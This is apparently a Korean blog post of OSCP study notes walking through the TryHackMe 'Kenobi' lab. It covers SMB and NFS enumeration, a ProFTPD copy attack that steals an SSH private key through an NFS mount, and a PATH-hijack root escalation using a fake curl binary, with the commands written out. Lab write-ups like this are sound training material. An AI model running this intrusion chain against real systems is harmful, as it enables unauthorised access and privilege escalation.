Kenobi
Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.
NMAP -> RPC, NFS, FTP, SMB, SSH
1. smbclient, smbget
2. Nmap nfs 스크립트 검색 (rpcbind)
3. NC로 FTP 배너그래빙 -> searchsploit -> Proftp copy exploit-> 1에서 얻은 로그파일 정보로 위치 파악, ssh개인키를 마운트된 폴더에 복사 -> 내 PC로 mount하여 개인키 다운로드 -> SSH 접속
권한상승
setuid 찾기, 두가지 방법
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 2>/dev/null
3. 생소한 바이너리 발견
/usr/bin/menu
4. menu 실행 후 프로그램 흐름 파악
5. strings를 사용하여 문자열 검색
- 프로그램 내에서 curl과 uname, ifconfig 바이너리를 상대경로를 사용하여 사용중
6. curl 파일명으로 /bin/sh 내용 입력
7. PATH 가장 앞부분에 생성된 바이너리의 현재 경로 추가 후 바이너리 실행
cd tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu
SMB client 명령어 (\: 사용불가)
smbclient ///anonymous
smbget -R smb:///anonoymous
마운트 명령어
- 마운트될 임의의 디렉터리 생성 후 mount 진행
mkdir /mnt/kenobiNFS
mount target_ip:/var /mnt/kenobiNFS
ssh 개인키로 접속
ssh -i id_rsa kenobi@<ip>
* id_rsa 개인키의 권한은 600으로 최소화해야 사용 가능함. (보안이슈)
rpcbind 서비스를 실행하는 포트 111.
RPC (원격 프로 시저 호출)
프로그램 번호를 범용 주소로 변환하는 서버 일뿐입니다.
RPC 서비스가 시작되면 rpcbind에게 수신 대기중인 주소와 서비스를 제공 할 RPC 프로그램 번호를 알려줍니다.
'OSCP > TryHackMe' 카테고리의 다른 글
[Linux] Skynet (0) | 2020.04.23 |
---|---|
[Linux] Game Zone (0) | 2020.04.22 |
[Windows] HackPark (0) | 2020.04.20 |
[Windows] Alfred (0) | 2020.04.16 |
[Windows] Steel Mountain (0) | 2020.04.14 |